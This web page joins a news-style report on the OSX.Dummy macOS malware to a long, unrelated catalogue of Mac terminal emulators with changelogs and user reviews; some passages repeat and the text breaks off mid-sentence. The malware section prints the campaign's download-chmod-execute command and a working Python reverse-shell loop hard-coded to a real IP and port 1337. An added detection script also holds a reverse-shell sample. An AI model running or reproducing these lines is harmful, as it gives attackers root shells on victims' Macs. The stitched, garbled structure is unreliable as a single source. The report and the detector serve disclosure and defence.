The Dumb Binary For Mac


Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs.

The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker. A Mac malware expert also examined the malware and dubbed it 'OSX.Dummy' because, as he wrote:

- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it's trivial to detect at every step (that dumb)
- And finally, the malware saves the user's password to dumpdummy

The attack, today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this:

    cd /tmp && curl -s curl $MALICIOUSURL > script && chmod +x script && ./script

The monster binary carries with it a host of libraries, including OpenSSL libraries to encrypt its communications back to the server—a system running in a data center of the hosting provider CrownCloud. Once it executes, it uses the sudo command to make itself owned by macOS's root user.

In order for this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called 'dumpdummy'. The script also issues commands to add itself to the startup list for macOS—making itself persistent.

The script's backdoor code, as Wardle noted, is a recursive Python command-line call with a hard-coded IP address for the connection that uses port 1337—an obvious joke.

    #!/bin/bash
    while :
    do
        python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
        sleep 5
    done

The attacker's intent is not yet clear. But because all of this executes through a Terminal window, it bypasses macOS's Gatekeeper malware protection, despite being unsigned code. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.
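The behaviours described above (a pasted download-chmod-run chain, a Python one-liner that wires a socket to standard input/output and spawns a shell, and a password written to a file named 'dumpdummy') can each be matched in process-execution telemetry. The following is an added example, not code from the article or from the researchers it cites; the event tuples, finding labels and function names are assumptions, and the sample events are constructed with a documentation-range address.

```python
import re

# Operators that separate the stages of a pasted shell one-liner.
STAGE_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")
CONNECT = re.compile(r"""connect\(\(\s*["']([^"']+)["']\s*,\s*(\d+)\s*\)\)""")
DUP2 = re.compile(r"dup2\([^,]+,\s*([012])\s*\)")
SHELL = re.compile(r"""["']/bin/(?:ba|z|k)?sh["']""")
STAGING_FILE = re.compile(r"(?:^|[\s/>])dumpdummy\b")

# Constructed (pid, command line) events; hosts and addresses are placeholders.
SAMPLE_EVENTS = [
    (501, "cd /tmp && curl -s https://example.invalid/payload > script"
          " && chmod +x script && ./script"),
    (502, """python -c 'import socket,subprocess,os; """
          """s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); """
          """s.connect(("192.0.2.10",1337)); os.dup2(s.fileno(),0); """
          """os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); """
          """p=subprocess.call(["/bin/sh","-i"]);'"""),
    (503, "curl -s https://example.invalid/install.sh -o install.sh"),
    (504, "python -c 'import json,sys; print(json.load(sys.stdin))'"),
    (505, "echo $PASS > /tmp/dumpdummy"),
]


def download_then_execute(cmdline):
    """True when one chain fetches a file, marks it executable, then runs it."""
    fetched = made_exec = False
    for stage in STAGE_SPLIT.split(cmdline):
        words = stage.split()
        if not words:
            continue
        if words[0] in ("curl", "wget"):
            fetched = True
        elif (fetched and words[0] == "chmod"
              and re.search(r"\+[rw]*x|\b7[0-7]{2}\b", stage)):
            made_exec = True
        elif made_exec and words[0].startswith(("./", "/tmp/")):
            return True
    return False


def inline_reverse_shell(cmdline):
    """Return (host, port) when a python -c payload ties a socket to stdio
    and launches a shell; otherwise None."""
    if not re.search(r"\bpython[\d.]*\s+-c\b", cmdline):
        return None
    peer = CONNECT.search(cmdline)
    redirected = set(DUP2.findall(cmdline))
    # Require stdin and stdout to be redirected plus a shell path literal,
    # so ordinary socket-using one-liners are not flagged.
    if peer and {"0", "1"} <= redirected and SHELL.search(cmdline):
        return peer.group(1), int(peer.group(2))
    return None


def triage(events):
    """Map pid -> list of findings for every event that matched something."""
    findings = {}
    for pid, cmdline in events:
        hits = []
        if download_then_execute(cmdline):
            hits.append("download-chmod-execute")
        peer = inline_reverse_shell(cmdline)
        if peer:
            hits.append("python-reverse-shell %s:%d" % peer)
        if STAGING_FILE.search(cmdline):
            hits.append("password-staging-file")
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The benign download (503) and the benign Python one-liner (504) are deliberately left unflagged: each detector requires the full combination of steps rather than any single keyword.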

Commercial; see text. Current Version: 3.0.4 (February 12, 2004) Cel Corporation produces Celview for Macintosh (formerly Celview: the new Mac RUMBA), which is a series of products that provides 3270 and 5250 display, print and file transfer capabilities via SNA, TCP/IP, and AppleTalk. Pricing starts at $199 for a single user license, and quickly scales down from there; see the for more information. Please note that you will need to obtain a product name and key code to ensure full functionality of the demo; see below for links.

Shareware; $20-$60 Current Version: 4.6.6 / 10.2.1 (July 21, 2010) dataComet is, without a doubt, the single most sophisticated terminal emulation client for the Mac. Quite a bit more mature than its predecessor Comet, above, it supports full emulation of PC-ANSI, VT-52, VT-100, VT-102, VT-220, IBM 3278 and IBM 3279 terminals, in glorious full color. It's extremely fast and feature-filled, supporting such unusual features as scrollback in 327x modes, X-Window-like window iconization, very sophisticated font handling (including leading control!), file transfers, very extensive preferences, superb printing controls, support for 5250 menus and function keys in 327x emulation modes, AppleScript support, and much, much more. Version 4.6.6 - the latest release for 'Classic' Mac OS - adds/changes the following: Adds support for IND$FILE transfers with IBM mainframes, improved support for SCO-ANSI emulation, support for entering a telephone number for automatic modem dialing in the 'New.'/'Reconfigure Session.' dialog, and several other features and bug fixes.

Version 10.2.1 - the latest release for Mac OS X - adds/changes the following: The emulator screen position is now saved correctly when the session document is closed; in 10.2.0, the position was only saved if the window had been zoomed. A zoomed emulator window will now appear on the same monitor when more than one monitor is in use. Command-Clicking on a document window title now brings up the standard MacOS file path popup menu, allowing you to view the file path and open folders in the Finder easily. The Window menu 'Next' command (option-tab) now proceeds to the next open window rather than stopping the cycle if a Session window has a closed connection. The appearance of emulator windows has been improved. The packet counters and timer are now greyed out when the session is closed, and the Rows and Columns fields at the bottom of the emulator screen now have more area allocated to them.

Dialogs have been fixed so the text cursor appears when the cursor is over the active text field. The appearance and functionality of the 'Find' dialog has been improved. The 'Backwards' checkbox has been replaced by a 'Previous' button. The 'Replace' command now works correctly when the 'Replace' text is empty. The 'Define Macros.' dialog now always displays the ASCII character zero (NUL), which is used in dataComet macros to terminate strings, as '\000' rather than the Comet Fonts '^A' character to avoid confusion. The 'Configure Terminal Session' dialog has been improved so that tabbing to the next field works in a sensible fashion, and clicking on a text field which does not apply to the current connection type produces a brief popup message rather than an annoying alert - and now it's not possible to enter text in that field.

The default session type for a 'New' session is now Telnet (or SSH for dataComet-Secure) rather than a 'Shell' session. Entering an empty address in the 'Configure Terminal Session' 'Connect to:' field now works correctly to connect to the machine's own IP address. The File Transfer Progress dialog now displays byte counts with commas. Fixed the File Transfer Progress dialog so the transfer counts are only updated once a second; this yields a substantial improvement (80%) in file transfer performance when using ZModem. IND$FILE IBM file transfers now display an update on the transmitted file length in the emulator prompt area. Several problems with edit windows have been fixed; extra lines should no longer appear in the window when text is pasted into the window. dataComet's edit windows now interpret linefeed characters in files so they display correctly, and saves them back to the file as linefeeds.

Edit windows will now reliably load up to the maximum 32,767 character limit, rather than failing to load the last 2,000 characters of a file which is over 30,000 characters in length. Saving a new Session configuration now always creates a new .edit companion text document, so a 'Save text' command will succeed when the session document is reopened, even when the .edit document was not saved the first time around. Changing the font in edit windows now takes effect immediately, rather than after the font size is changed. The 'Shift Text' buttons at the bottom left corner of edit windows now repeat when they're held down.

Saving a new session document to the global sessions folder now updates the Sessions submenu. Submenus have been fixed so they display more rapidly when you move the cursor over them to select an item from them. The 3270/5250 menus no longer shift position when the 5250 menu is toggled on and off in the 3270 preferences panel.

The Macros menu now always appears before the Window menu. Window Minimize and Maximize events are now handled better; the window's menu item in the Window menu is marked to show the window has been Minimized, and you can expand the window by selecting the item. SCP/RCP file transfers are now enabled in dataComet X, providing an alternative to using ZModem. SCP transfers in dataComet X are not encrypted (note that the 'scp' file transfer protocol is the same as UNIX's 'rcp' with a security layer wrapped around it.) Also, the SCP file transfer dialog no longer automatically brings up the Select File dialog when it's selected from the menu to perform an upload. Emulator screen printing: color banding which appeared when printing an emulator screen in color has been improved, so it should not appear unless a font is being drawn in double-wide/double-high modes (VT100). Also, the emulator cursor position may have appeared in screens printed in a very small size; this has also been fixed. dataComet is $20 for the 'Classic' version and $60 for the Mac OS X version.

User Reviews 'I am using dataComet and, from what I can see, it is a great telnet program. It seems to be more stable than NCSA 2.7b4.' —Mike Prindle 'Where do I buy the fan club t-shirt? It works; it has great features, and the users control the funding, rather than the University of Illinois. While I liked NCSA Telnet and Brown TN3270, and don't mean to imply that they did not work or were not also excellent, I like having one application do both.' —Andrew Starr 'I need to hook up to IBM mainframes; dataComet is the best tool for me. Features I like: 3279 and VT100 support, scroll-back buffers, macros, and fonts.

Tn3270 hasn't changed since 1996. DataComet is constantly improving.' —John Holland 10.0.2 'This program had so many options, it was hard to figure out what was going on. It has really amazing font customizability. You can even use a different font for bold text in the terminal. Unfortunately, it doesn't have tabbed terminals.

I have no idea why it opens up a second window when I start a new terminal. It ran quickly on my powerbook G4 867MHz, unlike iTerm.' —Edwin 10.0.2 'I'm using this for 3270 emulation, on a Mac Pro running 10.4.7. The UI is a little clunky compared to tn3270x (took me a couple minutes to figure out how to open a remote session versus a local terminal), and in ISPF it incorrectly renders certain common 3270 graphical elements (e.g. box borders, or the border below the top ISPF menu). However, it does support destructive backspace by default, which is something I have been unable to get tn3270x to do for me.

In general, its keyboard mapping flexibility appears superior to that of tn3270x, and it also supports a wider variety of automatic codepage translations for input (1047 versus 37, for example, and many others).' —Jared Hunter, September 22, 2006

Shareware; see text Current Version: 5.0.5 / 10.2.1 (July 21, 2010) Take dataComet, above, and add support for SSH1, SSH2, Kerberos 5, and SCP file transfers, and you've got dataComet-Secure. It's a stupendously good package with no real competition. The download below allows you to try the software out for 30 days; dataComet-Secure is priced at $70 per copy ($35 academic; volume discounts are available). Federal regulations mandated the switch to this pricing scheme for this version. Version 5.0.5 improves performance when running in the OS X Classic environment and includes several minor bug fixes. 'dataComet-Secure X' is a release of dataComet-Secure built for OS X (Carbon), which adds support for local shell sessions (Terminal sessions), OS X serial devices, and drag and drop in addition to support for Telnet/TN3270, SSH1, SSH2, Kerberos 5, and SCP file transfers.

Version 10.2.1 - the latest release for Mac OS X - adds/changes the following: The emulator screen position is now saved correctly when the session document is closed; in 10.2.0, the position was only saved if the window had been zoomed. A zoomed emulator window will now appear on the same monitor when more than one monitor is in use. Command-Clicking on a document window title now brings up the standard MacOS file path popup menu, allowing you to view the file path and open folders in the Finder easily. The Window menu 'Next' command (option-tab) now proceeds to the next open window rather than stopping the cycle if a Session window has a closed connection. The appearance of emulator windows has been improved. The packet counters and timer are now greyed out when the session is closed, and the Rows and Columns fields at the bottom of the emulator screen now have more area allocated to them.

Dialogs have been fixed so the text cursor appears when the cursor is over the active text field. The appearance and functionality of the 'Find' dialog has been improved. The 'Backwards' checkbox has been replaced by a 'Previous' button. The 'Replace' command now works correctly when the 'Replace' text is empty.

The 'Define Macros.' dialog now always displays the ASCII character zero (NUL), which is used in dataComet macros to terminate strings, as '\000' rather than the Comet Fonts '^A' character to avoid confusion.

The 'Configure Terminal Session' dialog has been improved so that tabbing to the next field works in a sensible fashion, and clicking on a text field which does not apply to the current connection type produces a brief popup message rather than an annoying alert - and now it's not possible to enter text in that field. The default session type for a 'New' session is now Telnet (or SSH for dataComet-Secure) rather than a 'Shell' session. Entering an empty address in the 'Configure Terminal Session' 'Connect to:' field now works correctly to connect to the machine's own IP address. The File Transfer Progress dialog now displays byte counts with commas. Fixed the File Transfer Progress dialog so the transfer counts are only updated once a second; this yields a substantial improvement (80%) in file transfer performance when using ZModem.

IND$FILE IBM file transfers now display an update on the transmitted file length in the emulator prompt area. Several problems with edit windows have been fixed; extra lines should no longer appear in the window when text is pasted into the window. dataComet's edit windows now interpret linefeed characters in files so they display correctly, and saves them back to the file as linefeeds. Edit windows will now reliably load up to the maximum 32,767 character limit, rather than failing to load the last 2,000 characters of a file which is over 30,000 characters in length. Saving a new Session configuration now always creates a new .edit companion text document, so a 'Save text' command will succeed when the session document is reopened, even when the .edit document was not saved the first time around. Changing the font in edit windows now takes effect immediately, rather than after the font size is changed. The 'Shift Text' buttons at the bottom left corner of edit windows now repeat when they're held down.

Saving a new session document to the global sessions folder now updates the Sessions submenu. Submenus have been fixed so they display more rapidly when you move the cursor over them to select an item from them. The 3270/5250 menus no longer shift position when the 5250 menu is toggled on and off in the 3270 preferences panel. The Macros menu now always appears before the Window menu. Window Minimize and Maximize events are now handled better; the window's menu item in the Window menu is marked to show the window has been Minimized, and you can expand the window by selecting the item.

SCP/RCP file transfers are now enabled in dataComet X, providing an alternative to using ZModem. SCP transfers in dataComet X are not encrypted (note that the 'scp' file transfer protocol is the same as UNIX's 'rcp' with a security layer wrapped around it.) Also, the SCP file transfer dialog no longer automatically brings up the Select File dialog when it's selected from the menu to perform an upload. Emulator screen printing: color banding which appeared when printing an emulator screen in color has been improved, so it should not appear unless a font is being drawn in double-wide/double-high modes (VT100). Also, the emulator cursor position may have appeared in screens printed in a very small size; this has also been fixed. Current Version: 1.2 GLterm is a replacement for the Terminal application which ships with Mac OS X.

It's made to be faster, and to support more common terminal features. It supports full ANSI colors, all vt102 protocols, all DEC function keys, and a selection of useful xterm sequences. The 'Big Thing' is that GLterm uses X11 .bdf fonts and renders them using OpenGL, so it's very fast, as long as you have a working 3D accelerator. It should work as intended on B&W G3s and up (for desktops) and on white iBooks and up (for laptops) - that is, any machine whose 3D accelerator is handled properly in OS X. Open source; $0 Current Version: 0.10 (October 8, 2009) iTerm is a full featured terminal emulation program written for OS X using Cocoa. It supports language encodings, VT100/ANSI/XTERM emulation and many convenient GUI features.

iTerm is merged from CTerminal and TerminalX. The program is based on the code of JTerminal, and a large part of the original code is rewritten to implement more features and to run more efficiently. The current version is still in a beta stage. Features include:

Native Cocoa application that supports Mac OS X 10.4 Tiger. Supports all language encodings that are available with OS X. Complete VT100 emulation, with additional support for most common xterm and ANSI escape sequences. Xterm compatibility. Address book. Anti-idle function that avoids disconnection because of no activity. Transparent windows.

Multi-Tab within one window. Version 0.10 adds/changes the following: Smart window placement - new terminals are positioned to avoid overlap with existing ones.

Open new tab in previous directory (See FAQ to get this to work). Improved drawing performance, particularly when the scrollback buffer is full. Better interactivity when terminals are busy, menus no longer block applications. Various terminal emulation fixes.

Cryptographically signed auto updates. Open source; $0 Current Version: 3.0b1 / 4.0 beta build 20100720 (July 21, 2010) Similar in scope to BetterTelnet, above, MacTelnet is a re-working of the public NCSA Telnet code that was abandoned by NCSA some time ago. It's very much modernized, and it is fully scriptable, includes support for Mac OS X, and more; however, this software has had a history of being fairly buggy - something that presents a real issue in a work that should be transparent and reliable as a daily work tool. The details the many ways in which MacTelnet differs from the original NCSA version. Version 3.0b1 - the final version for 'Classic' Mac OS - included many and several bug fixes, including the following: Bug Fix: miscellaneous issues during font list rebuilding.

Feature: macro sets may now contain up to 12 macros each (previously, only 10 were allowed); mapping from F1-F12 or command-0 through command-=. Feature: macros now support the '\e' sequence for Escape, just like the Mac OS X version.

Feature: floating keypad windows no longer have an Aqua appearance; instead, they look like real keyboard keys! Feature: Bigger Text and Smaller Text commands are now available.

Feature: Show FTP Log command is once again available; this displays server activity. User Interface: now Classic MacTelnet uses the new Terminal Favorite Editor first introduced with the Mac OS X version; this new editor is less cramped and lets you configure default Bold text colors.

Cool Stuff: the About box now has background music. As of November 2008, all development has shifted to the Mac OS X version, which is now labeled version 4.

Commercial; $95 Current Version: 4.42 (February 28, 2004) / 12.11 (July 8, 2010) Carnation Software, Inc. produces an entire line of Macintosh terminal emulation software, including MacWise, which emulates ADDS Viewpoint, Wyse 50, Wyse 60, Wyse 370, Televideo TV 925, DEC VT100 and Prism terminals, among others. Esprit III color is also supported in Wyse 370 mode.

MacWise allows a Macintosh to be used as a terminal - connected to a host computer directly, by modem, or over the Internet. The emulators support video attributes such as dim, reverse, underline, 132-column modes, and graphic characters sent from the host computer, as well as enhanced Viewpoint mode. Features include phone list and dialer for Hayes-compatible modems, on-screen programmable function keys and more. Version 12.11 - the latest version for Mac OS X - adds/changes the following: Fix - Could not select Transparency from the Window Menu. The problem was introduced in the previous version.

Commercial; see text. Current Version: 4.3 / 2.0 (February 5, 2009) A remarkably simple alternative to its higher-priced counterparts (such as NLynx's Mac Midrange products), this provides very nice 5250 emulation via TCP/IP, and it's only a 125K download.

While the 'Classic' Mac OS version is now free, the Mac OS X version is priced at $25 for a single user ($250 for a site license); Mocha Mac TN5250 is a real bargain, too. The freely-downloadable version available below is fully functional, and should be used for evaluation purposes only. While no information is available regarding what's new in version 4.3 (the latest 'Classic' Mac OS version), version 4.2 added/changed the following: Hidden text was displayed on print. German EBCDIC character '@' was not correct.

Version 2.0 - the latest version for Mac OS X - makes the following changes: Added 128 bit SSL support.


User Reviews 'I selected this because CelView is way too costly. I was able to buy a company license for $250. That's slightly more than the cost of one individual license for CelView. The company is Danish and purchasing is through SWREG in Minnesota. I had no problem purchasing with a PO. I've contacted the company twice via email; I received a response within minutes. We tested with the trial version since last April and purchased in July.

MochaMac is a hit with our users. They report that it is more streamlined to use, the preferences are easier to modify, and they can control the look of the 'green' screen better.' —John Robertson. Commercial; $149 Current Version: 9.1 (November 30, 2009) Ericom Software produces PowerTerm InterConnect, a terminal emulator for Mac OS X that supports IBM (3270 and 5250), Compaq, Digital, Unix, Tandem, Televideo, HP, SCO, and Data General access, among others. Features include customizable function keys, multiple concurrent sessions, menu bar, scalable and selectable fonts, intelligent copy and paste, scripting, printing and more.

Version 9.1 adds/changes the following: Support for Mac OS X versions: 10.6 Snow Leopard, 10.5 Leopard, 10.4 Tiger, 10.3 Panther and 10.2 Jaguar. Fixed a display issue when scrolling in vt-100 mode. Freeware Current Version: 2.5b5 (March 13, 1996) / 3.1.7 (May 2, 2006) / 3.2.4 (July 24, 2006) The 'old standard' freeware tn3270 tool for the Macintosh from Brown University. Although the advent of the web has made this tool less relevant to many people, it's still required equipment for serious researchers who access remotely-hosted IBM 'big iron' services. It does a fine job, and is second in capability only to dataComet (above), which offers many more features as well as complete 'standard' telnet services.

That said, for basic access, tn3270 fits the bill nicely. Note: Brown University distributes two VM/CMS commands for use with tn3270: RMAC and WMAC. These commands provide the ability to upload and download CMS files using the tn3270 session connection. Until recently, RMAC and WMAC were not year-2000 compliant. However, the versions made available as of 12/30/99 have been updated and are compliant.

The Mac OS X version was introduced in May 2003, and is still actively updated and maintained. Version 3.1.7 - the latest version for Mac OS X 10.1.5 - 10.2.7 - includes the following changes:


Fixed a bug which caused tn3270 X to crash if a pending SSL connection is closed. Fixed a bug which caused tn3270 X to crash when opening an SSL connection on an Intel Mac (under Rosetta). Added Courier 34 as a large font which is useful for vision problems.

It allows a 24-by-80 window to fill a 20' display. Added support for the Bitstream Vera Sans Mono font, and included the font on the tn3270 disk image. Version 3.2.4 - the latest version for Mac OS X 10.2.8 and higher - includes the following changes: Added support for Kerberos encryption.

Added support for Kerberos 4 and 5 authentication. Added support for the Telnet Start TLS option. Removed 'glue' code for 10.1.5 compatibility (since Kerberos requires 10.2.8 in any case.) The has an active discussion where you can interact with the author. User Reviews 'The tn3270 emulation works very well. It has allowed me to keep a small Mac enclave alive in an otherwise very hostile Wintel environment. Even when running on a bunch of old LCII-IIIs, it is quick and faster than the dumb terminals being pushed at us by the IS support team.

It is this kind of software which unfortunately doesn't get enough press and support.' —Julian Wan 3.2.4 'I'm using this on a Mac Pro running 10.4.7, and it's very stable. Intuitive UI for connections, and I found it easy to make larger screen sizes work (36x80 versus 24x80, for example). I was also able to create a shortcut for the missing 'Insert Key' on my Apple keyboard by creating an app-specific command in the standard keyboard prefpane.

My one gripe is the lack of a robust keyboard mapping function, as I have yet to find a way to enable destructive backspace, but that will hopefully be solved by a system-level utility in the future.' —Jared Hunter, September 22, 2006. Shareware; $199 Current Version: 3.2 (December 3, 2004) While not strictly a terminal emulation application at all, those of you who understand what it does will also understand why I have categorized it onto this page. Commercial; $79.99 Current Version: 6.24 (July 7, 2010) EmTec Innovative Software produces ZOC, a telnet client, secure shell client and terminal emulator that is highly configurable. Distinguishing features include: Tabbed sessions. Overview screen to show thumbnails of all open sessions.

'Colorful tabs' feature to tint user interface elements with different colors depending on which host is connected. Host directory (with full option set for each entry and automatic login). User button bar to map texts, scripts, phone book entries, external protocols and shell commands to buttons (incl. button assistant). F-Macro keys for texts, scripts, phone book entries, external shell commands, etc.

Local typing (entry field with history e.g.